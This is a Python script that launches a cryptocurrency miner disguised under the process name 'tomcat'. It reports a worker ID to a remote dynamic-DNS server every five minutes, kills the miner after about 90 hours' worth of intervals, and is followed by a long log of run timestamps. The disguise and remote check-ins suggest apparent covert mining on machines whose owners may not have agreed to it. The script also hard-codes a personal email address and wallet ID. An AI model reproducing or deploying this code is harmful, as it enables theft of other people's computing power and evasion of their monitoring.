import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:15:07.728719
#2018-02-17 17:03:05.207633
#2018-02-17 18:51:02.120159
#2018-02-17 20:41:02.070031
#2018-02-17 22:28:05.146630
#2018-02-18 00:11:07.210534
#2018-02-18 02:03:06.744926
#2018-02-18 03:51:05.712959
#2018-02-18 05:38:06.117378
#2018-02-18 07:31:01.411382
#2018-02-18 09:19:01.695225
#2018-02-18 11:04:07.443888
#2018-02-18 12:51:07.620174
#2018-02-18 14:39:06.010207
#2018-02-18 16:28:02.125058
#2018-02-18 18:17:06.025793
#2018-02-18 20:02:04.904960
#2018-02-18 21:49:01.416982
#2018-02-18 23:38:03.961511
#2018-02-19 01:24:02.200740
#2018-02-19 03:12:03.362417
#2018-02-19 04:57:04.958919
#2018-02-19 06:42:07.039631
#2018-02-19 08:32:01.872788
#2018-02-19 10:21:04.112711
#2018-02-19 12:09:05.684579
#2018-02-19 13:56:01.898273
#2018-02-19 15:45:11.241001
#2018-02-19 17:34:05.973921
#2018-02-19 19:22:05.728480
#2018-02-19 21:10:09.206251
#2018-02-19 22:57:04.497931
#2018-02-20 00:42:05.425688
#2018-02-20 02:32:05.395745
#2018-02-20 04:22:03.745428
#2018-02-20 06:05:08.954091
#2018-02-20 07:50:08.717077
#2018-02-20 09:36:02.185854
#2018-02-20 11:21:08.764690
#2018-02-20 13:08:01.666091
#2018-02-20 14:51:06.233766
#2018-02-20 16:37:04.325394
#2018-02-20 18:24:07.882881
#2018-02-20 20:16:08.630464
#2018-02-20 22:02:04.706391
#2018-02-20 23:44:07.109244
#2018-02-21 01:29:06.642914
#2018-02-21 03:17:07.807309
#2018-02-21 05:05:08.272779
#2018-02-21 06:53:04.467599
#2018-02-21 08:39:05.232403
#2018-02-21 10:24:06.346793
#2018-02-21 12:11:02.130660
#2018-02-21 13:59:06.262271
#2018-02-21 15:43:08.783515
#2018-02-21 17:34:02.230141
#2018-02-21 19:20:08.435263
#2018-02-21 21:08:03.842881
#2018-02-21 22:55:07.324728
#2018-02-22 00:37:03.418471
#2018-02-22 02:24:07.291650
#2018-02-22 04:11:04.127741
#2018-02-22 05:56:05.866188
#2018-02-22 07:42:07.599358
#2018-02-22 09:31:06.056933
#2018-02-22 11:17:01.872529
#2018-02-22 13:02:06.370496
#2018-02-22 14:51:07.146690
#2018-02-22 16:38:06.959358
#2018-02-22 18:23:06.205109
#2018-02-22 20:17:04.167583
#2018-02-22 22:03:04.605896
#2018-02-22 23:50:01.667655
#2018-02-23 01:37:08.357241
#2018-02-23 03:25:07.860190
#2018-02-23 05:11:05.013890
#2018-02-23 06:57:01.467442
#2018-02-23 08:46:07.937838
#2018-02-23 11:02:08.523283
#2018-02-23 12:58:06.731872
#2018-02-23 14:42:08.094817
#2018-02-23 16:30:10.495362
#2018-02-23 18:17:05.319038
#2018-02-23 20:01:07.075873
#2018-02-23 21:45:01.532728
#2018-02-23 23:40:03.890727
#2018-02-24 01:32:03.904754
#2018-02-24 03:21:07.656232
#2018-02-24 05:05:04.833421
#2018-02-24 06:53:05.641746
#2018-02-24 08:43:01.388208
#2018-02-24 10:27:01.652029
#2018-02-24 12:21:07.587388
#2018-02-24 14:14:06.491392
#2018-02-24 16:01:01.527443
#2018-02-24 17:54:06.433906
#2018-02-24 19:41:06.280060
#2018-02-24 21:28:02.106226
#2018-02-25 00:12:05.757655
#2018-02-25 04:18:01.599864
#2018-02-25 07:49:03.707372